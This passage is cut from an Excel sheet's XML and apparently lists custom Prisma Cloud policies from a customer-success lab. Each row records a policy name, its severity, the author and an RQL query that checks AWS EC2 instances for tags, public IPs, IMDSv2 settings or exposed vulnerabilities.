      <c r="AD1669" t="b">
        <v>0</v>
      </c>
      <c r="AE1669" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1669" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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69" t="inlineStr">
        <is>
          <t>ff1c887a-625a-4bc1-8437-461e4b8c5d51</t>
        </is>
      </c>
      <c r="AI1669" t="inlineStr">
        <is>
          <t>0b4d2f6b-98bc-4008-a200-19026ebb6e68</t>
        </is>
      </c>
      <c r="AJ1669" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1669" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1670">
      <c r="A1670" t="inlineStr"/>
      <c r="B1670" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1670" s="2" t="inlineStr"/>
      <c r="D1670" t="n">
        <v>0</v>
      </c>
      <c r="E1670" t="n">
        <v>0</v>
      </c>
      <c r="F1670" t="n">
        <v>2</v>
      </c>
      <c r="G1670" t="b">
        <v>1</v>
      </c>
      <c r="H16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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1670" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1670" t="inlineStr">
        <is>
          <t>dmensah-shi-test-Must-not-Scan</t>
        </is>
      </c>
      <c r="L1670" t="inlineStr"/>
      <c r="M1670" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1670" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1670" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1670" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1670" t="inlineStr"/>
      <c r="R1670" t="inlineStr"/>
      <c r="S1670" t="inlineStr"/>
      <c r="T1670" t="b">
        <v>0</v>
      </c>
      <c r="U1670" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1670" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1670" t="inlineStr"/>
      <c r="X1670" t="inlineStr"/>
      <c r="Y1670" t="inlineStr"/>
      <c r="Z1670" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.account = 'dmensah-shi-test1' AND api.name = 'aws-ec2-describe-instances' AND json.rule = tags[?(@.key=='shi-must-not-scan'&amp;&amp; @.value=='')] size &gt; 0</t>
        </is>
      </c>
      <c r="AA1670" t="inlineStr">
        <is>
          <t>Daryl Mensah</t>
        </is>
      </c>
      <c r="AB1670" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1670" t="inlineStr"/>
      <c r="AD1670" t="b">
        <v>0</v>
      </c>
      <c r="AE1670" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1670" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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0" t="inlineStr">
        <is>
          <t>20cec263-9509-4f1e-805f-9bb4d5ec228f</t>
        </is>
      </c>
      <c r="AI1670" t="inlineStr">
        <is>
          <t>d0d1c05d-5c15-41d9-b7b0-12f9c9abc938</t>
        </is>
      </c>
      <c r="AJ1670" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1670" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1671">
      <c r="A1671" t="inlineStr"/>
      <c r="B1671" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1671" s="2" t="inlineStr"/>
      <c r="D1671" t="inlineStr"/>
      <c r="E1671" t="inlineStr"/>
      <c r="F1671" t="inlineStr"/>
      <c r="G1671" t="b">
        <v>0</v>
      </c>
      <c r="H16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71" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1671" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1671" t="inlineStr">
        <is>
          <t>BPTestTag</t>
        </is>
      </c>
      <c r="L1671" t="inlineStr"/>
      <c r="M1671" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1671" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1671" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1671" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1671" t="inlineStr"/>
      <c r="R1671" t="inlineStr"/>
      <c r="S1671" t="inlineStr"/>
      <c r="T1671" t="b">
        <v>0</v>
      </c>
      <c r="U1671" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1671" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1671" t="inlineStr"/>
      <c r="X1671" t="inlineStr"/>
      <c r="Y1671" t="inlineStr"/>
      <c r="Z1671" t="inlineStr">
        <is>
          <t>config from cloud.resource where tag ( 'owner') = 'Bishvesh' and api.name = 'aws-ec2-describe-instances' AND json.rule = imageId exists</t>
        </is>
      </c>
      <c r="AA1671" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1671" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1671" t="inlineStr"/>
      <c r="AD1671" t="b">
        <v>0</v>
      </c>
      <c r="AE1671" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1671" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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71" t="inlineStr">
        <is>
          <t>0bf0df1a-24ae-4d93-9e66-2e6b6a19be4e</t>
        </is>
      </c>
      <c r="AI1671" t="inlineStr">
        <is>
          <t>e4cae6a6-8bf5-401a-83c4-953bb769abfb</t>
        </is>
      </c>
      <c r="AJ1671" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1671" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1672">
      <c r="A1672" t="inlineStr"/>
      <c r="B1672" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1672" s="2" t="inlineStr"/>
      <c r="D1672" t="inlineStr"/>
      <c r="E1672" t="inlineStr"/>
      <c r="F1672" t="inlineStr"/>
      <c r="G1672" t="b">
        <v>0</v>
      </c>
      <c r="H16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72" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1672" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1672" t="inlineStr">
        <is>
          <t>Resource creation</t>
        </is>
      </c>
      <c r="L1672" t="inlineStr"/>
      <c r="M1672" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1672" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1672" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1672" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1672" t="inlineStr"/>
      <c r="R1672" t="inlineStr"/>
      <c r="S1672" t="inlineStr"/>
      <c r="T1672" t="b">
        <v>0</v>
      </c>
      <c r="U1672" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1672" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1672" t="inlineStr"/>
      <c r="X1672" t="inlineStr"/>
      <c r="Y1672" t="inlineStr"/>
      <c r="Z1672" t="inlineStr">
        <is>
          <t>config from cloud.resource where tag ( 'owner' ) = 'bpachauli' AND cloud.type = 'aws' AND cloud.service = 'Amazon EC2' AND api.name = 'aws-ec2-describe-instances' as X; count(X) greater than 1</t>
        </is>
      </c>
      <c r="AA1672" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1672" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1672" t="inlineStr"/>
      <c r="AD1672" t="b">
        <v>0</v>
      </c>
      <c r="AE1672" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1672" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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72" t="inlineStr">
        <is>
          <t>cbf2d348-f217-454c-bcd9-3ad3d8376677</t>
        </is>
      </c>
      <c r="AI1672" t="inlineStr">
        <is>
          <t>204948b0-a792-4c91-ac60-c86cf7d77449</t>
        </is>
      </c>
      <c r="AJ1672" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1672" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1673">
      <c r="A1673" t="inlineStr"/>
      <c r="B1673" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1673" s="2" t="inlineStr"/>
      <c r="D1673" t="n">
        <v>4428</v>
      </c>
      <c r="E1673" t="n">
        <v>302</v>
      </c>
      <c r="F1673" t="n">
        <v>2</v>
      </c>
      <c r="G1673" t="b">
        <v>1</v>
      </c>
      <c r="H16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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1673" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1673" t="inlineStr">
        <is>
          <t>jojo-dm-test-boyyyy</t>
        </is>
      </c>
      <c r="L1673" t="inlineStr"/>
      <c r="M1673" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1673" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1673" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1673" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1673" t="inlineStr"/>
      <c r="R1673" t="inlineStr"/>
      <c r="S1673" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="T1673" t="b">
        <v>0</v>
      </c>
      <c r="U1673" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1673" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1673" t="inlineStr"/>
      <c r="X1673" t="inlineStr"/>
      <c r="Y1673" t="inlineStr"/>
      <c r="Z1673" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = tags does not contain "shi-must-audit" or tags does not contain "shi-project-reference" and networkInterfaces[*].ownerId equal ignore case "891377326363"</t>
        </is>
      </c>
      <c r="AA1673" t="inlineStr">
        <is>
          <t>Daryl Mensah</t>
        </is>
      </c>
      <c r="AB1673" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1673" t="inlineStr"/>
      <c r="AD1673" t="b">
        <v>0</v>
      </c>
      <c r="AE1673" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1673" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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3" t="inlineStr">
        <is>
          <t>f9300214-9817-4ba5-9c9d-50a25fdec090</t>
        </is>
      </c>
      <c r="AI1673" t="inlineStr">
        <is>
          <t>92945171-86d6-4788-8d68-21d98f047a4d</t>
        </is>
      </c>
      <c r="AJ1673" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1673" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1674">
      <c r="A1674" t="inlineStr"/>
      <c r="B1674" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1674" s="2" t="inlineStr"/>
      <c r="D1674" t="n">
        <v>6</v>
      </c>
      <c r="E1674" t="n">
        <v>39</v>
      </c>
      <c r="F1674" t="n">
        <v>0</v>
      </c>
      <c r="G1674" t="b">
        <v>1</v>
      </c>
      <c r="H16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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1674" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1674" t="inlineStr">
        <is>
          <t>Demo -  Privilege escalation and lateral movement risk due to a publicly exposed and vulnerable AWS EC2 instance not configured with Metadata Service v2 (IMDSv2)</t>
        </is>
      </c>
      <c r="L1674" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1674" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1674" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1674" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1674" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1674" t="inlineStr"/>
      <c r="R1674" t="inlineStr"/>
      <c r="S1674" t="inlineStr"/>
      <c r="T1674" t="b">
        <v>0</v>
      </c>
      <c r="U1674" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1674" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1674" t="inlineStr"/>
      <c r="X1674" t="inlineStr"/>
      <c r="Y1674" t="inlineStr"/>
      <c r="Z1674" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) AND finding.name contains all ('AWS EC2 Instance IAM Role not enabled','AWS EC2 instance not configured with Instance Metadata Service v2 (IMDSv2)','AWS EC2 instance with network path to the internet (0.0.0.0/0)')</t>
        </is>
      </c>
      <c r="AA1674" t="inlineStr">
        <is>
          <t>Muhammad Rehan</t>
        </is>
      </c>
      <c r="AB1674" t="inlineStr">
        <is>
          <t>2024-11-05 00:42:42</t>
        </is>
      </c>
      <c r="AC1674" t="inlineStr"/>
      <c r="AD1674" t="b">
        <v>0</v>
      </c>
      <c r="AE1674" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1674" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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4" t="inlineStr">
        <is>
          <t>570197bd-bc3d-4731-8cc2-d8eda9a3a746</t>
        </is>
      </c>
      <c r="AI1674" t="inlineStr">
        <is>
          <t>4da83d0b-cad2-4b18-a3cc-8c32ac7fbfa3</t>
        </is>
      </c>
      <c r="AJ1674" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1674" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1675">
      <c r="A1675" t="inlineStr"/>
      <c r="B1675" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1675" s="2" t="inlineStr"/>
      <c r="D1675" t="inlineStr"/>
      <c r="E1675" t="inlineStr"/>
      <c r="F1675" t="inlineStr"/>
      <c r="G1675" t="b">
        <v>0</v>
      </c>
      <c r="H16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75" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1675" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1675" t="inlineStr">
        <is>
          <t>custom-aws-public-ip</t>
        </is>
      </c>
      <c r="L1675" t="inlineStr"/>
      <c r="M1675" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1675" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1675" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1675" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1675" t="inlineStr"/>
      <c r="R1675" t="inlineStr"/>
      <c r="S1675" t="inlineStr"/>
      <c r="T1675" t="b">
        <v>0</v>
      </c>
      <c r="U1675" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1675" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1675" t="inlineStr"/>
      <c r="X1675" t="inlineStr"/>
      <c r="Y1675" t="inlineStr"/>
      <c r="Z1675" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = publicIpAddress exists</t>
        </is>
      </c>
      <c r="AA1675" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1675" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1675" t="inlineStr"/>
      <c r="AD1675" t="b">
        <v>0</v>
      </c>
      <c r="AE1675" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1675" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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75" t="inlineStr">
        <is>
          <t>ef4500a0-4be3-4841-a189-df32fce35d32</t>
        </is>
      </c>
      <c r="AI1675" t="inlineStr">
        <is>
          <t>5bb73fd1-b4f1-4d90-81a7-f79d7b0d11e0</t>
        </is>
      </c>
      <c r="AJ1675" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1675" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1676">
      <c r="A1676" t="inlineStr">
        <is>
          <t>AWS Test for Client</t>
        </is>
      </c>
      <c r="B1676" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1676" s="2" t="inlineStr"/>
      <c r="D1676" t="n">
        <v>2872</v>
      </c>
      <c r="E1676" t="n">
        <v>201</v>
      </c>
      <c r="F1676" t="n">
        <v>2</v>
      </c>
      <c r="G1676" t="b">
        <v>1</v>
      </c>
      <c r="H16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jadempsey-alert-test, jbrox-AlertRule-MSTeams-Email, mark davis test 412024, pagerduty-test, splunk-test</t>
        </is>
      </c>
      <c r="I1676" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1676" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1676" t="inlineStr">
        <is>
          <t>policy-test-jadempsey</t>
        </is>
      </c>
      <c r="L1676" t="inlineStr"/>
      <c r="M1676" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1676" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1676" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1676" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1676" t="inlineStr">
        <is>
          <t>CIS v1.2.0 (AWS)</t>
        </is>
      </c>
      <c r="R1676" t="inlineStr">
        <is>
          <t>CIS v1.2.0 (AWS)</t>
        </is>
      </c>
      <c r="S1676" t="inlineStr"/>
      <c r="T1676" t="b">
        <v>0</v>
      </c>
      <c r="U1676" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1676" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1676" t="inlineStr"/>
      <c r="X1676" t="inlineStr"/>
      <c r="Y1676" t="inlineStr"/>
      <c r="Z1676" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-instances' AND json.rule = state.name equal ignore case "running"</t>
        </is>
      </c>
      <c r="AA1676" t="inlineStr">
        <is>
          <t>Jason Dempsey</t>
        </is>
      </c>
      <c r="AB1676" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1676" t="inlineStr"/>
      <c r="AD1676" t="b">
        <v>0</v>
      </c>
      <c r="AE1676" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1676" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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jadempsey-alert-test - Notifications:email, AccountGroups:PCS Azure Accounts;,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6" t="inlineStr">
        <is>
          <t>630d76ee-1cc6-459c-86bb-86d164825346</t>
        </is>
      </c>
      <c r="AI1676" t="inlineStr">
        <is>
          <t>ffa17866-b5e0-4825-8e10-f9069dd52fa7</t>
        </is>
      </c>
      <c r="AJ1676" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1676" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1677">
      <c r="A1677" t="inlineStr"/>
      <c r="B1677" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1677" s="2" t="inlineStr"/>
      <c r="D1677" t="inlineStr"/>
      <c r="E1677" t="inlineStr"/>
      <c r="F1677" t="inlineStr"/>
      <c r="G1677" t="b">
        <v>0</v>
      </c>
      <c r="H16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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1677" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1677" t="inlineStr">
        <is>
          <t>ClaytonTest - Unauthorized access risk due to a publicly exposed and vulnerable AWS EC2 instance</t>
        </is>
      </c>
      <c r="L1677" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1677" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1677" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1677" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1677" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1677" t="inlineStr"/>
      <c r="R1677" t="inlineStr"/>
      <c r="S1677" t="inlineStr"/>
      <c r="T1677" t="b">
        <v>0</v>
      </c>
      <c r="U1677" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1677" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1677" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed and have critical or high vulnerabilities.
Attackers can exploit these vulnerabilities to compromise the confidentiality, integrity, and availability of the affected EC2 instance, enabling them to perform malicious actions. The public exposure of these vulnerable EC2 instances makes them an easy target for attacks.
Immediate attention is required to remediate the critical and high vulnerabilities, and restrict public exposure reported for the instances as soon as possible.</t>
        </is>
      </c>
      <c r="X167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677" t="inlineStr"/>
      <c r="Z1677" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and with : (Vuln WHERE severity greater than or equal to high) and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)')</t>
        </is>
      </c>
      <c r="AA1677" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1677" t="inlineStr">
        <is>
          <t>2024-09-13 18:46:43</t>
        </is>
      </c>
      <c r="AC1677" t="inlineStr"/>
      <c r="AD1677" t="b">
        <v>0</v>
      </c>
      <c r="AE1677" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1677" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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7" t="inlineStr">
        <is>
          <t>0798014c-c42a-4312-bf2c-9ef03c220b03</t>
        </is>
      </c>
      <c r="AI1677" t="inlineStr">
        <is>
          <t>80c711f5-094a-44f0-aa79-38e01eeba956</t>
        </is>
      </c>
      <c r="AJ1677" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1677" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1678">
      <c r="A1678" t="inlineStr"/>
      <c r="B1678" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C1678" s="2" t="inlineStr"/>
      <c r="D1678" t="n">
        <v>0</v>
      </c>
      <c r="E1678" t="n">
        <v>292</v>
      </c>
      <c r="F1678" t="n">
        <v>0</v>
      </c>
      <c r="G1678" t="b">
        <v>1</v>
      </c>
      <c r="H167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dmensah-shi-test-Untagged -Resource, jbrox-AlertRule-MSTeams-Email, mark davis test 412024, pagerduty-test, splunk-test</t>
        </is>
      </c>
      <c r="I1678" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1678" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1678" t="inlineStr">
        <is>
          <t>dmensah-shi-test-Untagged -Resource</t>
        </is>
      </c>
      <c r="L1678" t="inlineStr"/>
      <c r="M1678" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1678" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1678" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1678" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1678" t="inlineStr"/>
      <c r="R1678" t="inlineStr"/>
      <c r="S1678" t="inlineStr"/>
      <c r="T1678" t="b">
        <v>0</v>
      </c>
      <c r="U1678" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1678" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1678" t="inlineStr"/>
      <c r="X1678" t="inlineStr"/>
      <c r="Y1678" t="inlineStr"/>
      <c r="Z1678" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.account = 'dmensah-shi-test1' AND api.name = 'aws-ec2-describe-instances' AND json.rule = tags[?(@.key=='shi-must-not-scan' &amp;&amp; @.value=='')].key does not exist and tags[?(@.key=='shi-must-scan' &amp;&amp; @.value=='')].key does not exist and tags[*].key does not contain "prismacloud" and tags[*].value does not contain "prismacloud"</t>
        </is>
      </c>
      <c r="AA1678" t="inlineStr">
        <is>
          <t>Daryl Mensah</t>
        </is>
      </c>
      <c r="AB1678" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1678" t="inlineStr"/>
      <c r="AD1678" t="b">
        <v>0</v>
      </c>
      <c r="AE1678" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1678" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG167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dmensah-shi-test-Untagged -Resource - Notifications:email, AccountGroups:dmensah-shi-test;,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8" t="inlineStr">
        <is>
          <t>adc8b12d-40c5-4a55-a80c-d23a1764233a</t>
        </is>
      </c>
      <c r="AI1678" t="inlineStr">
        <is>
          <t>8056d90b-3b69-43ec-9cac-17949ba2dc2d</t>
        </is>
      </c>
      <c r="AJ1678" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1678" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1679">
      <c r="A1679" t="inlineStr"/>
      <c r="B1679" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1679" s="2" t="inlineStr"/>
      <c r="D1679" t="inlineStr"/>
      <c r="E1679" t="inlineStr"/>
      <c r="F1679" t="inlineStr"/>
      <c r="G1679" t="b">
        <v>1</v>
      </c>
      <c r="H16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79" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1679" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1679" t="inlineStr">
        <is>
          <t>test vstoyko</t>
        </is>
      </c>
      <c r="L1679" t="inlineStr"/>
      <c r="M1679" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1679" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1679" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1679" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1679" t="inlineStr"/>
      <c r="R1679" t="inlineStr"/>
      <c r="S1679" t="inlineStr"/>
      <c r="T1679" t="b">
        <v>0</v>
      </c>
      <c r="U1679" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1679" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1679" t="inlineStr"/>
      <c r="X1679" t="inlineStr"/>
      <c r="Y1679" t="inlineStr"/>
      <c r="Z1679" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = tags[*].key equals "scan"</t>
        </is>
      </c>
      <c r="AA1679" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB1679" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1679" t="inlineStr"/>
      <c r="AD1679" t="b">
        <v>0</v>
      </c>
